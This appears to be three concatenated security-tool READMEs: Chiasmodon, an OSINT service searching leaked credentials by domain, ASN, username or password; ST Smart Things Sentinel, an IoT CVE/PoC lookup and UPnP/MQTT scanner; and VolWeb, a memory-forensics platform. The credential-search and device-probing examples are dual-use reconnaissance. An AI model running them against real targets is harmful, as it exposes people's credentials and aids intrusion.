Chiasmodon niger is a species of deep-sea fish in the family Chiasmodontidae, known for its ability to swallow fish larger than itself. And so do we.
Join us today and unlock the potential of our cutting-edge OSINT tool. Contact https://t.me/Chiasmod0n on Telegram to subscribe and start harnessing the power of Chiasmodon for your domain investigations.
pip install chiasmodon
Chiasmodon provides a flexible and user-friendly command-line interface and Python library. Here are some examples to demonstrate its usage:
How to use the pychiasmodon library:

```python
from pychiasmodon import Chiasmodon as ch

token = "PUT_HERE_YOUR_API_KEY"
obj = ch(token)
```
Searching for a target domain and its subdomains:
```bash
chiasmodon_cli.py --domain example.com --all
```

```python
result = obj.search('example.com', method='domain', all=True)

for i in result:
    print(i)
```
Searching for a target domain only (the results will cover just "example.com"):

```bash
chiasmodon_cli.py --domain example.com
```

```python
result = obj.search('example.com', method='domain')

for i in result:
    print(i)
```
Searching for a target application ID on the Google Play Store:
```bash
chiasmodon_cli.py --app com.discord
```

```python
result = obj.search('com.discord', method='app')

for i in result:
    print(i)
```
Searching for a target ASN:
```bash
chiasmodon_cli.py --asn AS123 --view-type cred
```

```python
result = obj.search('AS123', method='asn', view_type='cred')

for i in result:
    print(i)
```
Searching for a target username:

```bash
chiasmodon_cli.py --username someone
```

```python
result = obj.search('someone', method='username')

for i in result:
    print(i)
```
Searching for a target password:
```bash
chiasmodon_cli.py --password example@123
```

```python
result = obj.search('example@123', method='password')

for i in result:
    print(i)
```
Searching for a target CIDR:
```bash
chiasmodon_cli.py --cidr x.x.x.x/24
```

```python
result = obj.search('x.x.x.x/24', method='cidr')

for i in result:
    print(i)
```
Searching for target credentials by domain emails:
```bash
chiasmodon_cli.py --domain example.com --domain-emails
```

```python
result = obj.search('example.com', method='domain', only_domain_emails=True)

for i in result:
    print(i)
```

All methods and view types:
Methods | View Type |
---|---|
--domain, --email, --cidr, --app, --asn, --username, --password | --view-type cred |
--cidr, --asn, --email, --username, --password | --view-type app |
--domain, --email, --cidr, --asn, --username, --password | --view-type url |
--domain | --view-type subdomain |
--domain, --cidr, --asn, --app | --view-type email |
--domain, --cidr, --app, --asn, --email, --password | --view-type username |
--domain, --cidr, --app, --asn, --email, --username | --view-type password |
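Any method/view-type pairing from the table follows the same calling pattern as the examples above. For instance, here is a sketch that renders a domain search as subdomains, assuming the obj instance from the library setup earlier (parameter names reused from the snippets above):

```python
# Minimal sketch: domain search rendered as subdomains (see the table above).
result = obj.search('example.com', method='domain', view_type='subdomain')

for i in result:
    print(i)
```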
Please note that these examples represent only a fraction of the available options and use cases. Refer to the documentation for more detailed instructions and explore the full range of features provided by Chiasmodon.
Contributions and feedback are welcome! If you encounter any issues or have suggestions for improvements, please submit them to the Chiasmodon GitHub repository. Your input will help us enhance the tool and make it more effective for the OSINT community.
Chiasmodon is released under the MIT License. See the LICENSE file for more details.
Chiasmodon is intended for legal and authorized use only. Users are responsible for ensuring compliance with applicable laws and regulations when using the tool. The developers of Chiasmodon disclaim any responsibility for the misuse or illegal use of the tool.
Chiasmodon is the result of collaborative efforts from a dedicated team of contributors who believe in the power of OSINT. We would like to express our gratitude to the open-source community for their valuable contributions and support.
ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.
~ Hilali Abdel
USAGE
```bash
python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]
```
Add a new device:

```bash
python3 smartthings.py -a 192.168.1.1
```

Search for CVEs and PoCs by device type or firmware:

```bash
python3 smartthings.py -s --type TPLINK
python3 smartthings.py -s --firmware TP-Link Archer C7v2
```

Scan a device for open UPnP ports:

```bash
python3 smartthings.py -s --scan upnp --id
```

Get data from MQTT ('subscribe'):

```bash
python3 smartthings.py -s --scan mqtt --id
```
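For context, the MQTT 'subscribe' check boils down to connecting to the device's broker and listening on a wildcard topic. Below is a minimal sketch using the paho-mqtt client; the broker address is an assumption, and this is not the tool's own code.

```python
# Minimal sketch: subscribe to everything an IoT device's MQTT broker publishes.
# Uses the paho-mqtt 1.x constructor; 2.x also requires a CallbackAPIVersion.
import paho.mqtt.client as mqtt

def on_message(client, userdata, msg):
    # Print each published message as it arrives (truncated payload).
    print(msg.topic, msg.payload[:80])

client = mqtt.Client()
client.on_message = on_message
client.connect("192.168.1.1", 1883, keepalive=60)   # assumed broker address
client.subscribe("#")                               # wildcard: all topics
client.loop_forever()
```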
VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.
The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.
By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.
The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.
[!IMPORTANT] Take time to read the documentation in order to avoid common misconfiguration issues.
VolWeb exposes a REST API that lets analysts interact with the platform. A dedicated repository of community-maintained scripts is available at https://github.com/forensicxlab/VolWeb-Scripts. Check the project wiki to learn more about the available API calls.
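The real routes live in the project wiki and the VolWeb-Scripts repository. Purely to illustrate the shape of such a client, here is a sketch against a hypothetical endpoint and token header; both names are invented for this example and are not VolWeb's documented API.

```python
# Hypothetical sketch of a VolWeb API client -- the endpoint path and auth
# header below are placeholders; consult the project wiki for the real routes.
import requests

BASE_URL = "https://volweb.example.local"            # placeholder deployment URL
HEADERS = {"Authorization": "Token YOUR_API_TOKEN"}  # placeholder auth scheme

resp = requests.get(f"{BASE_URL}/api/evidences/", headers=HEADERS, timeout=30)
resp.raise_for_status()
for evidence in resp.json():
    print(evidence)
```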
If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.
Contact me at k1nd0ne@mail.com for any questions regarding this tool.
Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1